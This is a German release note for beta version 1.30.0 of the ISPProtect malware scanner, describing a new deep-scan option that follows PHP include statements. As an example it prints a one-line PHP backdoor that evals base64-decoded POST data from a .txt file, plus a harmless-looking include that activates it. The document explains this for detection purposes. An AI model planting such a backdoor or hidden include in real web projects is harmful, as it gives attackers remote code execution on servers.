Heute haben wir die Beta-Version 1.30.0 des ISPProtect Malware Scanners veröffentlicht.

Um Ihre ISPProtect-Instanz auf die Beta-Version zu aktualisieren, verwenden Sie ispp_scan --update --channel=beta. Beachten Sie, dass es sich um eine Beta-Version handelt, die noch Fehler enthalten kann.

Tiefenscan

Einige Angreifer betten ihre Malware nicht in bestehende oder neue PHP-Dateien ein. Stattdessen verwenden sie Dateien mit Nicht-PHP-Erweiterungen wie .txt, die dann mit require() / include() usw. in PHP-Dateien eingebunden werden. Dies macht die Malware schwieriger zu erkennen, da die Admins bei der Malware-Untersuchung oft hauptsächlich in PHP-Dateien schauen und dort die verdächtigen Includes übersehen könnten.

Die neue Version von ISPProtect verfügt über ein Scan-Argument --deep-check. Dieses Argument ermöglicht es ISPProtect, nach include/require-Anweisungen in PHP-Dateien zu suchen und anschließend die so eingebundenen Dateien ebenfalls zu scannen.

Schauen wir uns ein Beispiel an.

Malware-Beispiel

Hier haben wir eine Datei namens "database.txt", die den bösartigen Code enthält:

<?php
eval(base64_decode($_POST['mypost']));

Diese Datei wird normalerweise nicht vom PHP-Interpreter ausgeführt und kann von sich aus keinen Schaden anrichten, aber stellen Sie sich nun die folgende PHP-Datei vor:

<?php
/* einiger wirklich harmloser Codes hier */
define('PTH', realpath(dirname(__FILE__)));
include PTH . "/" . "database.txt";

Das macht die Datei database.txt alles andere als harmlos. Der Code bindet den Inhalt der .txt-Datei ein und interpretiert ihn als PHP-Code, sodass der Angreifer nun jeden beliebigen Befehl ausführen kann.

Natürlich wurden in der neuen Version auch weitere Malware- und False-Positive-Signaturen hinzugefügt.

Neue BETA-Version 1.30.0 mit „Tiefenscan“-Funktion